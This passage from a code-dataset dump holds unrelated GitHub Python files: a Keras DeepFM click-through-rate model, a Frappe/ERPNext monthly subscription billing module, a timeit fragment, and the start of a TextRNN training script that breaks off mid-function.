better computers will do better than my laptop\n n = 0\n for i in range(10):\n n += i\n end = timeit.default_timer()\n total_time += end - start\n\nprint(total_time/runs)\n\n# in general the more tests you do, the more precise answer you are going to get","repo_name":"HilaryHe1012/LecInfo","sub_path":"Timeit.py","file_name":"Timeit.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37587159534","text":"import numpy as np\nimport tensorflow as tf\n\nimport keras\nimport pandas as pd\nfrom keras.utils import plot_model\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom keras import backend as K\nimport gc\nfrom keras.layers import Input, Embedding, Dense,Flatten, Concatenate, Activation, Reshape, BatchNormalization, \\\n Dropout, Add, RepeatVector, Multiply, Lambda, Subtract\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nimport time\n\n# 对离散型变量进行编码 (LabelEncoder:[1,2,6] -> [0,1,2], OneHotEncode:[1] -> [0,1,0])\ndef category_encode(train_np, test_np=None, one_hot=True):\n lb_enc = LabelEncoder()\n train_all = np.vstack((train_np, test_np))\n train_all = np.unique(train_all)\n lb_enc.fit(train_all.reshape(-1, 1))\n train_np = lb_enc.transform(train_np.reshape(-1, 1))\n test_np = lb_enc.transform(test_np.reshape(-1, 1))\n if one_hot:\n oh_enc = OneHotEncoder()\n train_all = np.vstack((train_np.reshape(-1, 1), test_np.reshape(-1, 1)))\n train_all = np.unique(train_all)\n oh_enc.fit(train_all.reshape(-1, 1))\n sparse_train_np = oh_enc.transform(train_np.reshape(-1, 1))\n sparse_test_np = oh_enc.transform(test_np.reshape(-1, 1))\n return sparse_train_np, sparse_test_np\n return train_np, test_np\n\ndef log_loss(y_true, y_pred):\n log_loss = K.sum(K.binary_crossentropy(y_true, y_pred), axis=-1)\n return log_loss\n\n\nclass DeepFM():\n def __init__(self, params):\n self.dnn_layers = params.get(\"dnn_layers\", 4)\n self.emb_dims = params.get(\"emb_dims\", 4)\n self.dnn_dims = params.get(\"dnn_dims\", 8)\n self.label_col = params.get(\"label_col\", \"label\")\n self.category_col = params.get(\"category_col\", []) # possible values of each feature\n self.continue_col = params.get(\"continue_col\", [])\n self.learning_rate = params.get(\"learning_rate\", 0.01)\n self.batch_size = params.get(\"batch_size\", 64)\n self.epochs = params.get(\"epochs\", 10)\n self.seed = params.get(\"random_seed\", 2021)\n self.regularize = params.get(\"regularize\", keras.regularizers.l2)\n self.opt_reg_param = params.get(\"opt_rag_param\", 0.15)\n self.layer_reg_param = params.get(\"layer_reg_param\", 0.2)\n self.dropout = params.get(\"dropout\", 0.9)\n self.continue_use_emb = params.get(\"continue_use_emb\", True)\n self.model_name = params.get(\"model_name\", \"deepFM\")\n self.model = None\n\n def build_model(self):\n dnn_layers = self.dnn_layers\n emb_dim = self.emb_dims\n dnn_dim = self.dnn_dims\n category_col = self.category_col\n continue_col = self.continue_col\n lr = self.learning_rate\n seed = self.seed\n reg = self.regularize\n layer_reg_param = self.layer_reg_param\n dropout = self.dropout\n continue_use_emb = self.continue_use_emb\n\n np.random.seed(seed)\n inputs = []\n flatten_layers = []\n\n # ------second order term------- 离散型和连续型变量统一编码为隐向量,维度一致\n for category_index, num in enumerate(category_col):\n inputs_c = Input(shape=(1,), dtype='int32', name='input_%d' % category_index)\n inputs.append(inputs_c)\n embed_c = Embedding(\n num,\n emb_dim,\n input_length=1,\n 
name='embed_%d' % category_index,\n embeddings_regularizer=reg(layer_reg_param)\n )(inputs_c)\n\n flatten_c = Reshape((emb_dim,))(embed_c)\n flatten_layers.append(flatten_c)\n inputs_dict = []\n\n for continue_feature in continue_col:\n inputs_c = Input(shape=(1,), dtype='float', name='input_sec_%s' % continue_feature)\n inputs.append(inputs_c)\n inputs_c = BatchNormalization(name='BN_%s' % continue_feature)(inputs_c)\n inputs_dict.append(inputs_c)\n if continue_use_emb:\n inputs_c = Dense(emb_dim)(inputs_c)\n else:\n inputs_c = RepeatVector(emb_dim)(inputs_c)\n inputs_c = Flatten()(inputs_c)\n flatten_layers.append(inputs_c)\n\n sum_features_emb = Add()(flatten_layers)\n sum_square_features_emb = Multiply()([sum_features_emb, sum_features_emb]) # 和的平方\n square_list = []\n for layer in flatten_layers:\n square_feature_emb = Lambda(lambda x: x**2)(layer)\n square_list.append(square_feature_emb)\n square_sum_features_emb = Add()(square_list) # 平方的和\n y_second_order = Subtract()([sum_square_features_emb, square_sum_features_emb])\n y_second_order = Lambda(lambda x: x * 0.5)(y_second_order)\n y_second_order = Dropout(dropout, seed=seed)(y_second_order)\n\n # ----first order------\n fm_layers = []\n for category_index, num in enumerate(category_col):\n embed_c = Embedding(\n num,\n 1,\n input_length=1,\n name='linear_%s' % category_index,\n embeddings_regularizer=reg(layer_reg_param)\n )(inputs[category_index])\n flatten_c = Flatten()(embed_c)\n fm_layers.append(flatten_c)\n\n for index, _ in enumerate(continue_col):\n inputs_c = Dense(1)(inputs[len(category_col)+index])\n fm_layers.append(inputs_c)\n y_first_order = Add()(fm_layers)\n y_first_order = BatchNormalization()(y_first_order)\n y_first_order = Dropout(dropout, seed=seed)(y_first_order)\n\n # deep\n y_deep = Concatenate()(flatten_layers) # None * (F*K)\n for index in range(dnn_layers):\n y_deep = Dense(dnn_dim)(y_deep)\n y_deep = Activation('relu', name='deep_%d' % index)(y_deep)\n y_deep = Dropout(rate=dropout, seed=seed)(y_deep)\n\n concat_input = Concatenate(axis=1)([y_first_order, y_second_order, y_deep])\n\n outputs = Dense(1, activation='sigmoid', name='output')(concat_input)\n self.model = Model(inputs=inputs, outputs=outputs, name='model')\n solver = Adam(lr=lr, decay=0.1)\n\n self.model.compile(optimizer=solver, loss='binary_crossentropy', metrics=[auc, log_loss])\n plot_model(self.model, to_file='DeepFM.png', rankdir='LR')\n return self.model\n\n def fit(self, X, y, val_X, val_y, batch_size=None, epochs=None):\n if not batch_size:\n batch_size = self.batch_size\n if not epochs:\n epochs = self.epochs\n his = self.model.fit(X, y, batch_size=batch_size, validation_data=(val_X, val_y), epochs=epochs)\n self.model.save(self.model_name)\n return his\n\n def predict(self, test_X):\n model = keras.models.load_model(self.model_name, custom_objects={\"auc\": auc, \"log_loss\": log_loss})\n y_pred = model.predict(test_X)\n return y_pred\n\n# PFA, prob false alert for binary classifier\ndef binary_PFA(y_true, y_pred, threshold=K.variable(value=0.5)):\n y_pred = K.cast(y_pred >= threshold, 'float32')\n # N = total number of negative labels\n N = K.sum(1 - y_true)\n # FP = total number of false alerts, alerts from the negative class labels\n FP = K.sum(y_pred - y_pred * y_true)\n return FP/N\n\n# P_TA prob true alerts for binary classifier\ndef binary_PTA(y_true, y_pred, threshold=K.variable(value=0.5)):\n y_pred = K.cast(y_pred >= threshold, 'float32')\n # P = total number of positive labels\n P = K.sum(y_true)\n # TP = total number of 
correct alerts, alerts from the positive class labels\n TP = K.sum(y_pred * y_true)\n return TP/P\n\ndef auc(y_true, y_pred):\n ptas = tf.stack([binary_PTA(y_true,y_pred,k) for k in np.linspace(0, 1, 1000)],axis=0)\n pfas = tf.stack([binary_PFA(y_true,y_pred,k) for k in np.linspace(0, 1, 1000)],axis=0)\n pfas = tf.concat([tf.ones((1,)) ,pfas],axis=0)\n binSizes = -(pfas[1:]-pfas[:-1])\n s = ptas*binSizes\n return K.sum(s, axis=0)\n\n\nif __name__ == '__main__':\n df_all = pd.read_csv(\"../ctr_data.csv\")\n df_train = df_all[:int(len(df_all)*0.8)]\n df_test = df_all[int(len(df_all)*0.8):]\n print(df_train.head())\n print(df_test.head())\n\n all_columns = df_train.columns.tolist()\n\n params = {\"label_col\": \"click\",\n \"continue_col\": [\"C14\", \"C15\", \"C16\", \"C17\", \"C18\", \"C19\", \"C20\", \"C21\"],\n \"dnn_layers\": 2,\n \"emb_dims\": 8,\n \"dnn_dims\": 32,\n \"learning_rate\": 0.01,\n \"batch_size\": 64,\n \"epochs\": 25,\n \"random_seed\": 2021,\n \"regularize\": keras.regularizers.l2,\n \"opt_reg_param\": 0.15,\n \"layer_reg_param\": 0.2,\n \"dropout\": 0.8,\n \"continue_use_emb\": True,\n \"model_name\": \"deepFM\"\n }\n\n all_features = all_columns.copy()\n all_features.remove(params.get(\"label_col\"))\n continue_columns = params.get(\"continue_col\", [])\n print(continue_columns, all_columns)\n\n col_index = []\n for col in all_features:\n col_index.append(all_columns.index(col))\n\n target_col = all_columns.index(params.get(\"label_col\"))\n\n category_columns = all_features.copy()\n [category_columns.remove(x) for x in continue_columns]\n max_features = {}\n for i in range(len(category_columns)):\n max_features[category_columns[i]] = (df_all[category_columns[i]].unique().shape[0])\n\n # del df_all\n # gc.collect()\n\n max_features_df = pd.DataFrame(data=np.array([list(max_features.keys()), list(max_features.values())]).T,\n columns=['ids', 'max_features'], index=range(len(max_features)))\n\n max_features = pd.merge(pd.DataFrame(category_columns, columns=['ids']), max_features_df, on=['ids'])\n\n max_features.max_features = max_features.max_features.astype(int)\n max_features = max_features.max_features.tolist()\n params[\"category_col\"] = max_features\n\n for i in category_columns:\n df_train[i], df_test[i] = category_encode(df_train[i].values.reshape(-1, 1),\n df_test[i].values.reshape(-1, 1), one_hot=False)\n\n train_x, train_y = df_train[all_features], df_train[params.get('label_col')]\n test_x, test_y = df_test[all_features], df_test[params.get('label_col')]\n del df_test\n del df_train\n gc.collect()\n\n X = train_x.T.values\n y = train_y.values\n X = [np.array(X[i, :]) for i in range(X.shape[0])]\n validation_data = (test_x.T.values, test_y.values)\n val_X, val_y = validation_data\n val_X = [np.array(val_X[i, :]) for i in range(val_X.shape[0])]\n\n del train_x\n del validation_data\n gc.collect()\n\n deepFM = DeepFM(params)\n deepFM.build_model()\n his = deepFM.fit(X, y, val_X, val_y, epochs=15)\n\n pd.DataFrame(his.history).to_csv(\"%s_his.csv\" % (time.strftime('%Y-%m-%d', time.localtime(time.time()))))\n\n y_pred = deepFM.predict(val_X)\n\n from sklearn.metrics import roc_auc_score, log_loss\n\n print(roc_auc_score(val_y, y_pred))\n print(log_loss(val_y, y_pred))","repo_name":"xnfan/MachineLearning","sub_path":"推荐专题/deepFM/deepFM.py","file_name":"deepFM.py","file_ext":"py","file_size_in_byte":11091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71860155771","text":"from __future__ import 
unicode_literals\nimport frappe\nimport datetime\nfrom frappe.model.document import Document\nfrom erpnext.accounts.party import get_party_account, get_due_date\nimport math\nfrom frappe.utils import flt\nfrom collections import Counter\nfrom functools import reduce\nfrom operator import add\n\n\nclass MonthlyPSOFBilling(Document):\n \"\"\"Monthly Billing Generation\"\"\"\n\n def on_trash(self):\n self.status = 'Bills Deleted'\n linked_docs = self.count_linked_doc()\n frappe.get_doc(\"Monthly PSOF\", self.monthly_psof).db_set(\"billing_generated\", 0)\n\n frappe.db.delete(\"Subscription Bill\", {'subscription_period': self.name})\n frappe.db.delete(\"Subscription Bill Item\", {'subscription_period': self.name})\n frappe.db.delete(\"Monthly PSOF Bill\", {'subscription_period': self.name})\n\n frappe.db.delete(\"Sales Invoice\", {'subs_period': self.name})\n\n frappe.msgprint(msg=f\"\"\"Deleting the following documents:<br>\n <b>{linked_docs['s']}</b> Subscription Bill/s<br>\n <b>{linked_docs['sb']}</b> Subscription Bill Item/s<br>\n <b>{linked_docs['mb']}</b> Monthly Billing Items/s<br>\"\"\")\n frappe.db.commit()\n\n def count_linked_doc(self):\n subs_bill = frappe.db.count(\"Subscription Bill\", {'subscription_period': self.name})\n subs_bill_items = frappe.db.count(\"Subscription Bill Item\", {'subscription_period': self.name})\n monthly_bill = frappe.db.count(\"Monthly PSOF Bill\", {'subscription_period': self.name})\n return {\"s\": subs_bill, \"mb\": monthly_bill, \"sb\": subs_bill_items}\n\n def truncate(self, number, digits) -> float:\n stepper = 10.0 ** digits\n return math.trunc(stepper * number) / stepper\n\n def truncate_first(self, number, digits) -> float:\n stepper = 100.0 ** digits\n x = math.trunc(stepper * number) / stepper\n return self.truncate(x, 2)\n\n def autoname(self):\n self.name = self.subscription_period\n\n def on_cancel(self):\n frappe.db.set(self, 'status', 'Cancelled')\n # sb = frappe.get_doc(\"Subscription Bill\", {'subscription_period': self.name})\n #sb.cancel()\n\n frappe.db.sql(\"\"\"update `tabSubscription Bill` set docstatus=2\n WHERE subscription_period = %s \"\"\", (self.name))\n\n frappe.db.sql(\"\"\"update `tabSubscription Bill Item` set docstatus=2\n WHERE parent in ( select name from `tabSubscription Bill` where subscription_period= %s )\"\"\", (self.name))\n\n linked_docs = frappe.get_all(\"Sales Invoice\", filters={\"subs_period\": self.name})\n for linked_doc in linked_docs:\n linked_doc_obj = frappe.get_doc(\"Sales Invoice\", linked_doc.name)\n linked_doc_obj.cancel()\n\n #si = frappe.get_doc(\"Sales Invoice\", {'subs_period': self.name})\n #si.cancel()\n\n\n def check_accounts(self, items):\n for p in items:\n if None in [\n p.msf_ar_account,\n p.decoder_ar_account,\n p.card_ar_account,\n p.promo_ar_account,\n p.freight_ar_account,\n p.msf_sales_account,\n p.decoder_sales_account,\n p.card_sales_account,\n p.promo_sales_account,\n p.freight_sales_account,\n p.vat_account\n ]:\n frappe.msgprint(msg=f\"{p.subscription_program} has incomplete accounting details\",\n title=\"Incomplete Account Details\",\n indicator=\"red\",\n raise_exception=True)\n return True\n\n def on_submit(self):\n if self.billings:\n self.submit_billings()\n\n frappe.msgprint(\n msg='Bills successfully posted',\n title='Success',\n indicator='yellow',\n raise_exception=False\n )\n else:\n frappe.msgprint(\n msg='Billing should create first Before Submission',\n title='Billing Not Created',\n indicator='red',\n raise_exception=True\n )\n\n def submit_billings(self):\n 
bills = self.get_billings()\n for bill in bills:\n bill.submit()\n\n def get_billings(self):\n subscription_bill = frappe.db.get_list(\"Monthly PSOF Bill\", {\"parent\": self.name}, \"bill_no\", pluck=\"bill_no\")\n return [frappe.get_doc(\"Subscription Bill\", bill_no) for bill_no in subscription_bill]\n\n @frappe.whitelist()\n def create_sales_invoice(self):\n bills = self.get_billings()\n \n for bill in bills:\n bill.create_invoices()\n\n def create_journal_entries(self):\n mpsof = frappe.db.get_list(\"Monthly PSOF Bill\", {\"parent\": self.name}, as_dict=1)\n\n for b in mpsof:\n bill = frappe.db.get_list(\"Subscription Bill\", b.get(\"bill_no\"), as_dict=1)\n\n for i in bill:\n doc = frappe.new_doc(\"Journal Entry\")\n doc.entry_type = \"Journal Entry\"\n doc.posting_date = i.bill_date\n doc.bill_no = i.name\n doc.bill_date = i.bill_date\n doc.due_date = i.due_date\n doc.reference_no = i.name\n doc.reference_date = i.bill_date\n doc.subscription_period = i.subscription_period\n doc.user_remark = \"Billing Entry For \" + i.name\n\n item = frappe.db.sql(\"\"\"SELECT \n i.*,\n p.msf_ar_account,\n p.decoder_ar_account,\n p.card_ar_account,\n p.promo_ar_account,\n p.freight_ar_account,\n p.msf_sales_account,\n p.decoder_sales_account,\n p.card_sales_account,\n p.promo_sales_account,\n p.freight_sales_account,\n p.vat_account \n FROM \n `tabSubscription Bill Item` i, `tabSubscription Program` p\n WHERE i.parent = %s\n AND i.subscription_program = p.name\"\"\", (i.name), as_dict=1)\n\n if self.check_accounts(item):\n for d in item:\n if d.subscription_rate >= 0:\n doc.append('accounts', {\n \"account\": d.msf_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.subscription_fee,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.subscription_rate + d.vat\n })\n doc.append('accounts', {\n \"account\": d.msf_sales_account,\n \"credit\": d.subscription_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.subscription_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.subscription_fee - d.subscription_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.vat\n })\n if d.decoder_rate >= 0:\n doc.append('accounts', {\n \"account\": d.decoder_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": round(d.decoder_rate_vat, 2),\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.decoder_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.decoder_sales_account,\n \"credit\": round(d.decoder_rate, 2),\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.decoder_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": round(d.decoder_rate_vat, 2) - round(d.decoder_rate, 2),\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": round(d.decoder_rate_vat, 2) - round(d.decoder_rate, 2)\n })\n if d.card_rate >= 0:\n doc.append('accounts', {\n \"account\": d.card_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.card_rate_vat,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.card_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.card_sales_account,\n \"credit\": d.card_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.card_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.card_rate_vat - d.card_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.card_rate_vat - d.card_rate\n })\n if d.promo_rate >= 0:\n doc.append('accounts', {\n 
\"account\": d.promo_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.promo_rate_vat,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.promo_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.promo_sales_account,\n \"credit\": d.promo_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.promo_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.promo_rate_vat - d.promo_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.promo_rate_vat - d.promo_rate\n })\n if d.freight_rate >= 0:\n doc.append('accounts', {\n \"account\": d.freight_ar_account,\n \"party_type\": \"Customer\",\n \"party\": i.customer,\n \"debit\": d.freight_rate_vat,\n \"exchange_rate\": 1,\n \"debit_in_account_currency\": d.freight_rate_vat\n })\n doc.append('accounts', {\n \"account\": d.freight_sales_account,\n \"credit\": d.freight_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.freight_rate\n })\n doc.append('accounts', {\n \"account\": d.vat_account,\n \"credit\": d.freight_rate_vat - d.freight_rate,\n \"exchange_rate\": 1,\n \"credit_in_account_currency\": d.freight_rate_vat - d.freight_rate\n })\n\n doc.insert()\n doc.submit()\n bills = frappe.get_doc(\"Subscription Bill\", i.name)\n bills.journal_reference = doc.name\n bills.save()\n bills.submit()\n\n @frappe.whitelist()\n def create_bills(self):\n sales_bills = frappe.db.sql(\"\"\"\n SELECT \n d.customer, \n h.date, \n h.subscription_period,\n h.currency, \n p.exchange_rate, \n p.end_date,\n d.psof, \n d.parent,\n d.account_manager, \n d.tax_category as tx\n FROM \n `tabMonthly PSOF` h, \n `tabMonthly PSOF Program Bill` d, \n `tabSubscription Period` p\n WHERE \n h.name = d.parent \n AND \n h.name = %s\n AND \n h.subscription_period = p.name\n GROUP BY \n d.customer, \n h.date, \n h.subscription_period, \n p.exchange_rate; \"\"\", self.monthly_psof, as_dict=1)\n\n period = frappe.get_doc(\"Subscription Period\", self.subscription_period)\n\n def vat_(rate):\n if not rate:\n return 0\n return flt(rate / 1.12)\n\n def sum_(lists):\n return flt(sum([flt(i) for i in lists]), 2)\n\n def round2(rate):\n return frappe.db.sql(f\"SELECT ROUND({rate}, 2)\")[0][0]\n\n def round_convert(rate, exchange_rate=self.exchange_rate):\n return frappe.db.sql(f\"SELECT ROUND({rate} * {exchange_rate}, 2)\")[0][0]\n\n def get_difference(rate):\n if not rate:\n return 0\n return rate - vat_(rate)\n\n for bill in sales_bills:\n customer_ = frappe.get_doc(\"Customer\", bill.customer)\n doc = frappe.new_doc(\"Subscription Bill\")\n doc.customer = bill.customer\n doc.customer_name = bill.customer_name\n doc.bill_date = bill.date\n doc.subscription_period = bill.subscription_period\n doc.due_date = get_due_date(doc.bill_date, \"Customer\", doc.customer)\n doc.exchange_rate = self.exchange_rate\n doc.account_manager = bill.account_manager\n doc.assistant = customer_.billing_assistant\n doc.monthly_psof = bill.parent\n doc.psof = bill.psof\n\n sbill_items = frappe.db.get_all('Monthly PSOF Program Bill',\n {'parent': self.monthly_psof,\n 'customer': bill.customer},\n ['subscription_fee as sfee', 'subscription_rate as srate', 'vat',\n 'decoder_rate as drate', 'promo_rate as prate', 'freight_rate as frate',\n 'card_rate as crate', 'subscription_program as program', 'psof'])\n\n totals = {\n 't_msf': 0,\n 't_diff': 0,\n 't_vat_ex': 0,\n 't_vat': 0,\n 'msf': sum([i['sfee'] for i in sbill_items]),\n 'decoder': sum([i['drate'] for i in sbill_items]),\n 'promo': sum([i['prate'] 
for i in sbill_items]),\n 'freight': sum([i['frate'] for i in sbill_items]),\n 'card': sum([i['crate'] for i in sbill_items]),\n 'php_msf': sum([round_convert(i['sfee']) for i in sbill_items]),\n 'php_drate': sum([round_convert(i['drate']) for i in sbill_items]),\n 'php_prate': sum([round_convert(i['prate']) for i in sbill_items]),\n 'php_frate': sum([round_convert(i['frate']) for i in sbill_items]),\n 'php_crate': sum([round_convert(i['crate']) for i in sbill_items]),\n }\n\n for p in sbill_items:\n allocations = {\n \"msf\": round_convert(p.sfee),\n \"decoder_rate\": round_convert(p.drate),\n \"card_rate\": round_convert(p.crate),\n \"promo_rate\": round_convert(p.prate),\n \"freight_rate\": round_convert(p.frate),\n \"decoder_diff\": get_difference(round_convert(p.drate)),\n \"card_diff\": get_difference(round_convert(p.crate)),\n \"promo_diff\": get_difference(round_convert(p.prate)),\n \"freight_diff\": get_difference(round_convert(p.frate)),\n }\n allocations[\"total\"] = round2(sum((flt(allocations[\"decoder_rate\"]), flt(allocations[\"promo_rate\"]),\n flt(allocations[\"card_rate\"]), flt(allocations[\"freight_rate\"]))))\n allocations[\"vat_inc\"] = round2(allocations[\"msf\"] - allocations[\"total\"])\n allocations[\"vat_ex\"] = round2(vat_(allocations[\"vat_inc\"]))\n allocations[\"vat\"] = round2(allocations[\"vat_ex\"] * 0.12)\n allocations[\"vat_ex\"] = round2(allocations[\"vat_inc\"] - allocations[\"vat\"])\n allocations[\"comp_total\"] = round2(sum([allocations[\"vat_ex\"], allocations[\"vat\"],\n allocations[\"total\"]]))\n allocations[\"comp_diff\"] = allocations[\"msf\"] - allocations[\"comp_total\"]\n allocations[\"comp_vat_ex\"] = allocations[\"vat_ex\"] + allocations[\"comp_diff\"]\n\n bill_totals = {'created_from': self.monthly_psof, 'customer': doc.customer,\n 'subscription_period': doc.subscription_period, 'bill_date': doc.bill_date,\n \"subscription_program\": p.program, \"subs_fee\": p.sfee,\n \"subscription_fee\": allocations['msf'], \"subscription_rate_inc\": allocations[\"vat_inc\"],\n \"subscription_rate_ex\": allocations[\"vat_ex\"], \"vat\": allocations[\"vat\"],\n \"decoder_rate\": vat_(allocations[\"decoder_rate\"]),\n \"card_rate\": vat_(allocations[\"card_rate\"]),\n \"promo_rate\": vat_(allocations[\"promo_rate\"]),\n \"freight_rate\": vat_(allocations[\"freight_rate\"]), \"monthly_psof_no\": doc.monthly_psof,\n \"psof_no\": p.psof, 'total_alloc': vat_(allocations[\"total\"]),\n 'total_alloc_vat': allocations[\"total\"], \"decoder_rate_vat\": allocations[\"decoder_rate\"],\n \"card_rate_vat\": allocations[\"card_rate\"], \"promo_rate_vat\": allocations[\"promo_rate\"],\n \"freight_rate_vat\": allocations[\"freight_rate\"], 'card_diff': allocations[\"card_diff\"],\n 'decoder_diff': allocations[\"decoder_diff\"], 'freight_diff': allocations[\"freight_diff\"],\n 'promo_diff': allocations[\"promo_diff\"],\n 'total_diff': get_difference(allocations[\"total\"]),\n 'computed_total': allocations[\"comp_total\"], 'computed_diff': allocations[\"comp_diff\"],\n 'computed_vat_ex': allocations[\"comp_vat_ex\"], \"billing_currency\": \"PHP\",\n \"rounding_diff\": [],\n 'tax_category': bill.get('tx')}\n\n for i in [\"decoder\", \"card\", \"promo\", \"freight\"]:\n bill_totals[\"rounding_diff\"].append(flt((bill_totals.get(f\"{i}_rate_vat\") - (bill_totals.get(f\"{i}_rate_vat\") / 1.12)), 2) - bill_totals.get(f\"{i}_diff\"))\n\n bill_totals[\"rounding_diff\"] = flt(sum(bill_totals[\"rounding_diff\"]), 2)\n doc.append('items', bill_totals)\n\n totals[\"t_msf\"] += 
allocations[\"comp_total\"]\n totals[\"t_diff\"] += allocations[\"comp_diff\"]\n totals[\"t_vat_ex\"] += allocations[\"comp_vat_ex\"]\n totals[\"t_vat\"] += allocations[\"vat\"]\n\n doc.flags.ignore_mandatory = True\n doc.insert()\n\n totals[\"usd_allocation\"] = sum([totals['decoder'], totals['promo'], totals['freight'], totals['card']])\n totals[\"allocation\"] = sum([totals['php_drate'], totals['php_prate'], totals['php_frate'], totals['php_crate']])\n totals[\"vat\"] = totals[\"t_vat\"]\n totals[\"vat_inc\"] = totals[\"php_msf\"] - totals[\"allocation\"]\n totals[\"vat_ex\"] = totals[\"vat_inc\"] - totals[\"vat\"]\n totals[\"comp_total\"] = round2(sum((totals[\"vat_ex\"], totals[\"vat\"], totals[\"allocation\"])))\n totals[\"comp_diff\"] = totals[\"php_msf\"] - totals[\"comp_total\"]\n totals[\"comp_vat_ex\"] = totals[\"vat_ex\"] + totals[\"comp_diff\"]\n\n\n _totals_usd = reduce(add, (map(Counter, [\n {\"drate\": i.get(\"drate\"), \"prate\": i.get(\"prate\"), \"frate\": i.get(\"frate\"),\n \"crate\": i.get(\"crate\")} for i in sbill_items])))\n\n self.append('billings', {\n 'tax_category': bill.get('tx'),\n \"billing_currency\": \"PHP\",\n 'customer_name': customer_.customer_name,\n 'subscription_period': period.name,\n 'billing_date': period.end_date,\n 'currency': 'USD',\n 'exchange_rate': self.exchange_rate,\n \"account_manager\": doc.account_manager or \"\",\n \"assistant\": doc.assistant,\n \"customer\": doc.customer,\n \"bill_no\": doc.name,\n \"date\": doc.bill_date,\n 'total_msf': totals['msf'],\n 'total_msf_vat_inc': totals['msf'] - totals[\"usd_allocation\"],\n 'total_msf_vat_ex': vat_(totals['msf'] - totals[\"usd_allocation\"]),\n 'total_vat': vat_(totals['msf'] - totals[\"usd_allocation\"]) * 0.12,\n 'total_decoder_rate': totals['decoder'],\n 'total_promo_rate': totals['promo'],\n 'total_freight_rate': totals['freight'],\n 'total_card_rate': totals['card'],\n 'usd_msf': totals[\"php_msf\"],\n 'usd_msf_lv_inc': totals[\"vat_inc\"],\n 'usd_msf_lv_ex': totals[\"vat_ex\"],\n 'usd_vat': totals[\"vat\"],\n 'usd_decoder': totals[\"php_drate\"],\n 'usd_promo': totals[\"php_prate\"],\n 'usd_freight': totals[\"php_frate\"],\n 'usd_card': totals[\"php_crate\"],\n 'usd_decoder_ex': vat_(totals[\"decoder\"]),\n 'usd_promo_ex': vat_(totals[\"promo\"]),\n 'usd_freight_ex': vat_(totals[\"freight\"]),\n 'usd_card_ex': vat_(totals[\"card\"]),\n 'decoder_vat': get_difference(totals[\"php_drate\"]),\n 'promo_vat': get_difference(totals[\"php_prate\"]),\n 'freight_vat': get_difference(totals[\"php_frate\"]),\n 'card_vat': get_difference(totals[\"php_crate\"]),\n 'total_vat_inc': totals[\"allocation\"],\n \"computed_tamount\": totals[\"t_msf\"],\n \"computed_tdiff\": totals[\"t_diff\"],\n \"computed_vat_ex\": totals[\"t_vat_ex\"] + totals[\"t_diff\"],\n \"total_vat_ex\": sum_(vat_(totals[i]) for i in [\"decoder\", \"promo\", \"freight\", \"card\"]),\n \"total_vat_diff\": totals[\"allocation\"] - round2(vat_(totals[\"allocation\"])),\n \"t_drate_\": _totals_usd.get(\"drate\"),\n \"t_prate_\": _totals_usd.get(\"prate\"),\n \"t_frate_\": _totals_usd.get(\"frate\"),\n \"t_crate_\": _totals_usd.get(\"crate\"),\n \"t_rate_\": sum(_totals_usd.values()),\n \"v_drate\": get_difference(_totals_usd.get(\"drate\")),\n \"v_prate\": get_difference(_totals_usd.get(\"prate\")),\n \"v_frate\": get_difference(_totals_usd.get(\"frate\")),\n \"v_crate\": get_difference(_totals_usd.get(\"crate\")),\n \"v_rate\": get_difference(sum(_totals_usd.values())),\n \"x_drate\": vat_(totals[\"php_drate\"]),\n \"x_prate\": 
vat_(totals[\"php_prate\"]),\n \"x_frate\": vat_(totals[\"php_frate\"]),\n \"x_crate\": vat_(totals[\"php_crate\"]),\n \"x_rate\": vat_(totals[\"allocation\"]),\n })\n \n self.create_sales_invoice()\n\n frappe.msgprint(\n msg='Bill successfully generated',\n title='Success',\n indicator='yellow',\n raise_exception=False\n )\n self.save()\n self.db_set(\"generated\", 1)\n frappe.db.set_value(\"Monthly PSOF\", self.get(\"monthly_psof\"), \"billing_generated\", 1)\n","repo_name":"jeowsome/subscription","sub_path":"subscription/subscription/doctype/monthly_psof_billing/monthly_psof_billing.py","file_name":"monthly_psof_billing.py","file_ext":"py","file_size_in_byte":25452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42189660702","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n===============================================================\nauthor:XieDake\nemail:DakeXqq@126.com\ndate:2018\nintroduction:\n Train and eval for TextRNN!\n===============================================================\n\"\"\"\nimport torch\nfrom data_helper import generate_one_sample\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport random\n\ndef train_one_epoch(epoch_num,model,optimizer,data_train,batch_size,w2id):\n '''\n 完成一个epoch数据训练!\n 每一个batch进行一次BP!每一个Batch,print训练信息!\n 注意:该函数执行之前data_filter需要乱序!\n '''\n #shuffle\n random.shuffle(data_train)\n data_size=len(data_train)\n criterion = 